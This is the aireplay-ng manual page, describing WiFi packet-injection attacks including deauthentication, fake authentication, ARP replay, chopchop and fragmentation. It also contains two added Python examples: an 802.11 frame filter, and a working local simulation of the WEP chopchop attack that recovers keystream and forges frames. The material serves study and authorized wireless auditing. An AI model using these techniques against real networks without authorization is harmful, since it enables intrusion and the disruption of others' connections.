AIREPLAY-NG(1)              General Commands Manual             AIREPLAY-NG(1)



NAME

       aireplay-ng - inject packets into a wireless network to generate traffic


SYNOPSIS

       aireplay-ng [options] <replay interface>


DESCRIPTION

       aireplay-ng is used to inject and replay 802.11 frames. Its primary
       function is to generate traffic for later use with aircrack-ng when
       cracking WEP and WPA-PSK keys. The available attacks include
       deauthentication (used to capture WPA handshakes), fake
       authentication, interactive packet replay, hand-crafted ARP request
       injection and ARP-request reinjection. With the packetforge-ng tool
       it is possible to create arbitrary frames for injection.

       aireplay-ng supports injection and monitoring on a single NIC.
       This feature needs driver patching.


OPTIONS

       -H, --help
              Shows the help screen.

       Filter options:

       -b <bssid>
              MAC address of the access point.

       -d <dmac>
              MAC address of the destination.

       -s <smac>
              MAC address of the source.

       -m <len>
              Minimum packet length.

       -n <len>
              Maximum packet length.

       -u <type>
              Frame control, type field.

       -v <subt>
              Frame control, subtype field.

       -t <tods>
              Frame control, "To DS" bit (0 or 1).

       -f <fromds>
              Frame control, "From DS" bit (0 or 1).

       -w <iswep>
              Frame control, WEP (protected) bit (0 or 1).

       -D     Disable AP detection.

       Replay options:

       -x <nbpps>
              Number of packets per second.

       -p <fctrl>
              Set the frame control word (hex).

       -a <bssid>
              Set the access point MAC address.

       -c <dmac>
              Set the destination MAC address.

       -h <smac>
              Set the source MAC address.

       -g <nb_packets>
              Change the ring buffer size (default: 8 packets). The minimum
              is 1.

       -F     Choose the first matching packet.

       -e <essid>
              Fake authentication attack: set the target SSID (see below).
              For SSIDs containing special characters, see
              http://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_single_quote_etc._in_ap_names

       -o <npackets>
              Fake authentication attack: set the number of packets sent for
              every authentication and association attempt (default: 1). 0
              means auto.

       -q <seconds>
              Fake authentication attack: set the time between keep-alive
              packets in fake authentication mode.

       -y <prga>
              Fake authentication attack: specifies the keystream (PRGA)
              file used for fake shared key authentication.

       -T n   Fake authentication attack: exit if fake authentication fails
              'n' time(s).

       -j     ARP replay attack: inject FromDS packets (see below).

       -k <IP>
              Fragmentation attack: set the destination IP in fragments.

       -l <IP>
              Fragmentation attack: set the source IP in fragments.

       -B     Test option: bitrate test.

       Source options:

       -i <iface>
              Capture packets from this interface.

       -r <file>
              Extract packets from this pcap file.

       Miscellaneous options:

       -R     Disable /dev/rtc usage.

       Attack modes:

       -0 <count>, --deauth=<count>
              This attack sends deauthentication packets to one or more
              clients which are currently associated with a particular
              access point; a <count> of 0 sends them continuously. Clients
              are deauthenticated for a number of reasons: to recover a
              hidden ("cloaked") ESSID, i.e. one that is not being
              broadcast; to capture WPA/WPA2 handshakes by forcing clients
              to reauthenticate; or to generate ARP requests (Windows
              clients sometimes flush their ARP cache when disconnected).
              Of course, this attack is useless if there is no associated
              wireless client, and it has no effect on fake
              authentications.

       -1 <delay>, --fakeauth=<delay>
              The fake authentication attack allows you to perform the two
              types of WEP authentication (Open System and Shared Key) and
              then associate with the access point (AP). <delay> is the
              time in seconds between re-association attempts; 0 performs a
              single attempt. This is only useful when you need an
              associated MAC address for various aireplay-ng attacks and
              there is currently no associated client. Note that the fake
              authentication attack does NOT generate any ARP packets. Fake
              authentication cannot be used to authenticate/associate with
              WPA/WPA2 access points.

       -2, --interactive
              This attack lets you choose a specific packet to replay
              (inject). The packets to replay can come from two sources: a
              live flow of packets from your wireless card, or a pcap file.
              Reading from a file is an often overlooked feature of
              aireplay-ng: it lets you reuse packets from other capture
              sessions, and several attacks write pcap files precisely for
              easy reuse. A common use is reading a file containing a
              packet you created with packetforge-ng.

       -3, --arpreplay
              The classic ARP request replay attack is the most effective
              way to generate new initialization vectors (IVs), and works
              very reliably. The program listens for an ARP packet and then
              retransmits it back to the access point. This in turn causes
              the access point to repeat the ARP packet with a new IV. The
              program retransmits the same ARP packet over and over, and
              each ARP packet repeated by the access point carries a new
              IV. It is all these new IVs which allow aircrack-ng to
              determine the WEP key.

       -4, --chopchop
              This attack, when successful, can decrypt a WEP data packet
              without knowing the key, and can even work against dynamic
              WEP. It does not recover the WEP key itself but merely
              reveals the plaintext (and with it the keystream used for
              that IV). However, some access points are not vulnerable to
              this attack. Some may seem vulnerable at first but actually
              drop data packets shorter than 60 bytes. If the access point
              drops packets shorter than 42 bytes, aireplay-ng tries to
              guess the rest of the missing data, as far as the headers are
              predictable. If an IP packet is captured, it additionally
              checks that the header checksum is correct after guessing the
              missing parts. This attack requires at least one WEP data
              packet.

       -5, --fragment
              This attack, when successful, can obtain 1500 bytes of PRGA
              (pseudo-random generation algorithm output, i.e. keystream).
              It does not recover the WEP key itself but merely obtains the
              PRGA, which can then be used to generate packets with
              packetforge-ng for the various injection attacks. It requires
              at least one data packet to be received from the access point
              in order to initiate the attack.

       -6, --caffe-latte
              In general, for an attack to work the attacker has to be
              within range of an AP and a connected client (fake or real).
              The Caffe Latte attack allows you to gather enough packets to
              crack a WEP key without the need for an AP; it only needs a
              client to be in range.

       -7, --cfrag
              This attack turns IP or ARP packets from a client into ARP
              requests against that client. It works especially well
              against ad-hoc networks, and can also be used against softAP
              clients and normal AP clients.

       -9, --test
              Tests whether the interface can inject and reports the link
              quality.

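       The filter options above select frames by the fields of the 802.11
       frame control word and by the three address fields, whose roles (BSSID,
       source, destination) depend on the To DS / From DS bits. The following
       example, added to this page and not part of aircrack-ng, decodes those
       fields from raw frames and applies a filter with the same semantics as
       -b/-d/-s/-u/-v/-t/-f/-w/-m/-n. The frames, MAC addresses and helper
       names (parse, matches, select, deauth_reason) are constructed for the
       demonstration; the deauthentication frame shows what attack mode -0
       sends (management type 0, subtype 12, with a 16-bit reason code).

```python
"""Decode 802.11 frame control and addresses and apply aireplay-ng style
filters.  Added example, not aircrack-ng code.  Frames below are constructed
by hand and assume plain 3-address (or 4-address WDS) headers without QoS."""
import struct
from dataclasses import dataclass


@dataclass
class Frame:
    ftype: int      # frame control type: 0 management, 1 control, 2 data
    subtype: int    # frame control subtype (12 = deauthentication for type 0)
    to_ds: int
    from_ds: int
    protected: int  # the "WEP bit" (-w) of the frame control flags
    bssid: str
    src: str
    dst: str
    length: int
    body: bytes     # everything after the MAC header


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse(frame: bytes) -> Frame:
    """Decode the MAC header; address roles follow the DS-bit table."""
    if len(frame) < 24:
        raise ValueError("802.11 header needs at least 24 bytes")
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, from_ds, protected = fc1 & 0x1, (fc1 >> 1) & 0x1, (fc1 >> 6) & 0x1
    a1, a2, a3 = _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22])
    hdr = 24
    if not to_ds and not from_ds:        # IBSS or management: DA, SA, BSSID
        dst, src, bssid = a1, a2, a3
    elif from_ds and not to_ds:          # AP -> station: DA, BSSID, SA
        dst, bssid, src = a1, a2, a3
    elif to_ds and not from_ds:          # station -> AP: BSSID, SA, DA
        bssid, src, dst = a1, a2, a3
    else:                                # WDS: RA, TA, DA, SA (addr4 after seq ctl)
        if len(frame) < 30:
            raise ValueError("4-address header needs at least 30 bytes")
        hdr = 30
        bssid, dst, src = a1, a3, _mac(frame[24:30])  # no single BSSID; report RA
    return Frame(ftype, subtype, to_ds, from_ds, protected,
                 bssid, src, dst, len(frame), frame[hdr:])


def matches(f: Frame, *, bssid=None, dmac=None, smac=None, ftype=None,
            subtype=None, tods=None, fromds=None, iswep=None,
            min_len=None, max_len=None) -> bool:
    """Every given criterion must hold; omitted criteria are wildcards."""
    wanted = [(bssid, f.bssid), (dmac, f.dst), (smac, f.src), (ftype, f.ftype),
              (subtype, f.subtype), (tods, f.to_ds), (fromds, f.from_ds),
              (iswep, f.protected)]
    for want, got in wanted:
        if want is None:
            continue
        if isinstance(want, str):
            want = want.lower()
        if want != got:
            return False
    if min_len is not None and f.length < min_len:
        return False
    if max_len is not None and f.length > max_len:
        return False
    return True


def select(frames, **criteria):
    """Return the parsed frames that pass the filter, in input order."""
    return [f for f in map(parse, frames) if matches(f, **criteria)]


def deauth_reason(f: Frame) -> int:
    """Reason code carried by a deauthentication/disassociation frame."""
    if not (f.ftype == 0 and f.subtype in (10, 12)):
        raise ValueError("not a deauthentication or disassociation frame")
    return struct.unpack("<H", f.body[:2])[0]


def build_header(fc0, fc1, a1, a2, a3, seq=0, duration=0) -> bytes:
    return (bytes([fc0, fc1]) + struct.pack("<H", duration) + a1 + a2 + a3
            + struct.pack("<H", seq << 4))


# Constructed addresses and frames (not captured traffic).
AP_MAC, STA_MAC, GW_MAC = "00:11:22:33:aa:bb", "00:c0:ca:12:34:56", "00:11:22:33:00:01"
AP, STA, GW = (bytes.fromhex(m.replace(":", "")) for m in (AP_MAC, STA_MAC, GW_MAC))
# Deauthentication from the AP to the station: type 0, subtype 12 -> fc0 = 0xc0,
# reason code 7 (class 3 frame received from a nonassociated station).
DEAUTH = build_header(0xC0, 0x00, STA, AP, AP, seq=1) + struct.pack("<H", 7)
# WEP data frame station -> AP: type 2 (fc0 = 0x08), flags To DS | protected.
DATA_TODS = build_header(0x08, 0x41, AP, STA, GW, seq=9) + bytes.fromhex("a1b2c300") + bytes(range(40))
# WEP data frame relayed AP -> station: flags From DS | protected.
DATA_FROMDS = build_header(0x08, 0x42, STA, AP, GW, seq=3) + bytes.fromhex("d4e5f600") + bytes(range(60))
SAMPLE = [DEAUTH, DATA_TODS, DATA_FROMDS]

if __name__ == "__main__":
    for f in select(SAMPLE, bssid=AP_MAC, tods=1, iswep=1):   # like -b ... -t 1 -w 1
        print(f"{f.src} -> {f.dst} via {f.bssid}, {f.length} bytes")
```

       The address-role table is the part worth remembering: -b is matched
       against a different address field depending on the DS bits, so a
       filter written for station-to-AP frames (-t 1) will not select the
       AP's relayed copies (-f 1) even though both carry the same BSSID.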

FRAGMENTATION VERSUS CHOPCHOP

       Fragmentation:

              Pros
              - Can obtain the full packet length of 1500 bytes of XOR
              (keystream). This means you can subsequently create pretty
              well any size of packet.
              - May work where chopchop does not.
              - Is extremely fast; it yields the XOR stream very quickly
              when successful.

              Cons
              - Setup to execute the attack is more dependent on the device
              drivers. For example, Atheros does not generate the correct
              packets unless the wireless card is set to the MAC address
              you are spoofing.
              - You need to be physically closer to the access point, since
              if any packets are lost then the attack fails.

       Chopchop:

              Pros
              - May work where fragmentation does not.

              Cons
              - Cannot be used against every access point.
              - The maximum XOR (keystream) length is limited to the length
              of the packet you chopchop against.
              - Much slower than the fragmentation attack.

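       Both attacks end with the same artefact: the XOR stream (RC4
       keystream, "PRGA") for one IV, which packetforge-ng then reuses to
       build a valid packet of any shorter length. The following example,
       added to this page and not aircrack-ng code, simulates the chopchop
       attack (-4) against a local Python "access point" that accepts a frame
       only when its ICV verifies, recovers the plaintext and keystream one
       byte at a time from the ICV oracle, and then forges a new frame under
       the same IV from the recovered keystream. The key, IV, plaintext and
       the function names (rc4, wep_encrypt, make_oracle, chop_correction,
       chopchop, forge, demo) are constructed for the demonstration; the RC4
       keystream, 802.11 headers and the over-the-air replay that a real
       attack needs are left out.

```python
"""WEP chopchop and keystream (PRGA) reuse, simulated locally.
Added example, not aircrack-ng code.  Key, IV and plaintext are constructed."""
import struct
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """First n bytes of RC4 keystream (KSA + PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plain: bytes) -> bytes:
    """WEP body: (plain || CRC32(plain) little-endian) XOR RC4(iv || key)."""
    icv = struct.pack("<I", zlib.crc32(plain) & 0xFFFFFFFF)
    return _xor(plain + icv, rc4(iv + key, len(plain) + 4))


def make_oracle(key: bytes, iv: bytes):
    """Simulated AP: True iff the ICV verifies.  A real AP relays such frames
    and silently drops the rest, which is the only signal chopchop needs."""
    def accepts(cipher: bytes) -> bool:
        dec = _xor(cipher, rc4(iv + key, len(cipher)))
        return zlib.crc32(dec[:-4]) & 0xFFFFFFFF == struct.unpack("<I", dec[-4:])[0]
    return accepts


# CRC32 table (reflected polynomial 0xEDB88320) and the inverse of its top byte,
# which is a permutation of 0..255 because the table is linear and injective.
_TBL = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _TBL.append(_c)
_INV = {t >> 24: i for i, t in enumerate(_TBL)}


def chop_correction(guess: int) -> bytes:
    """Mask to XOR into the last 4 bytes of a packet whose final byte (plaintext
    value `guess`) was chopped off, so the shortened packet has a valid ICV.
    By CRC32 linearity the mask depends only on that one plaintext byte."""
    idx = _INV[guess ^ 0xFF]
    return struct.pack("<I", 0xFF ^ idx ^ ((_TBL[idx] << 8) & 0xFFFFFFFF))


def chopchop(cipher: bytes, accepts):
    """Recover (plaintext, keystream) for `cipher` using only the ICV oracle.
    Works from the last byte backwards, at most 256 queries per byte."""
    recovered, cur = bytearray(), bytes(cipher)
    while len(cur) > 4:
        body = cur[:-1]
        for g in range(256):
            cand = body[:-4] + _xor(body[-4:], chop_correction(g))
            if accepts(cand):
                recovered.append(g)
                cur = cand
                break
        else:
            raise RuntimeError("no guess accepted; oracle does not behave like WEP")
    recovered.extend(b"\x00" * 4)          # a 4-byte frame is just CRC32("") == 0
    plain_all = bytes(reversed(recovered))  # plaintext including the original ICV
    return plain_all[:-4], _xor(cipher, plain_all)


def forge(keystream: bytes, new_plain: bytes) -> bytes:
    """Encrypt a new body under the same IV from recovered keystream, as
    packetforge-ng does with a PRGA file.  Needs len(new_plain) + 4 bytes."""
    if len(new_plain) + 4 > len(keystream):
        raise ValueError("not enough keystream: chopchop only yields the packet's own length")
    icv = struct.pack("<I", zlib.crc32(new_plain) & 0xFFFFFFFF)
    return _xor(new_plain + icv, keystream)


KEY = bytes.fromhex("0102030405")   # constructed 40-bit WEP key (never known to the attacker)
IV = bytes.fromhex("a1b2c3")        # constructed IV, sent in the clear in the frame header
# Constructed plaintext: LLC/SNAP header for ARP followed by the start of an ARP request.
PLAIN = bytes.fromhex("aaaa030000000806") + bytes.fromhex("0001080006040001")


def demo():
    accepts = make_oracle(KEY, IV)
    cipher = wep_encrypt(KEY, IV, PLAIN)
    plain, ks = chopchop(cipher, accepts)
    forged = forge(ks, b"any shorter body")
    return plain, ks, accepts(forged)


if __name__ == "__main__":
    p, k, ok = demo()
    print("plaintext:", p.hex(), "keystream:", k.hex(), "forged frame accepted:", ok)
```

       The loop stops when only four ciphertext bytes remain, because a
       frame whose body is empty has the ICV CRC32("") = 0, which fixes the
       first four keystream bytes without any further queries. forge()
       refuses bodies longer than the recovered keystream minus the ICV,
       which is the chopchop limitation listed above; the fragmentation
       attack removes it by extending the keystream to 1500 bytes.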

AUTHOR

       This manual page was written by Adam Cecile <gandalf@le-vert.net> for
       the Debian system (but may be used by others). Permission is granted
       to copy, distribute and/or modify this document under the terms of the
       GNU General Public License, Version 2 or any later version published
       by the Free Software Foundation. On Debian systems, the complete text
       of the GNU General Public License can be found in
       /usr/share/common-licenses/GPL.


SEE ALSO

       airbase-ng(1)
       aircrack-ng(1)
       airdecap-ng(1)
       airdecloak-ng(1)
       airdriver-ng(1)
       airmon-ng(1)
       airodump-ng(1)
       airolib-ng(1)
       airserv-ng(1)
       airtun-ng(1)
       buddy-ng(1)
       easside-ng(1)
       ivstools(1)
       kstats(1)
       makeivs-ng(1)
       packetforge-ng(1)
       tkiptun-ng(1)
       wesside-ng(1)



Version 1.1                       April 2010                    AIREPLAY-NG(1)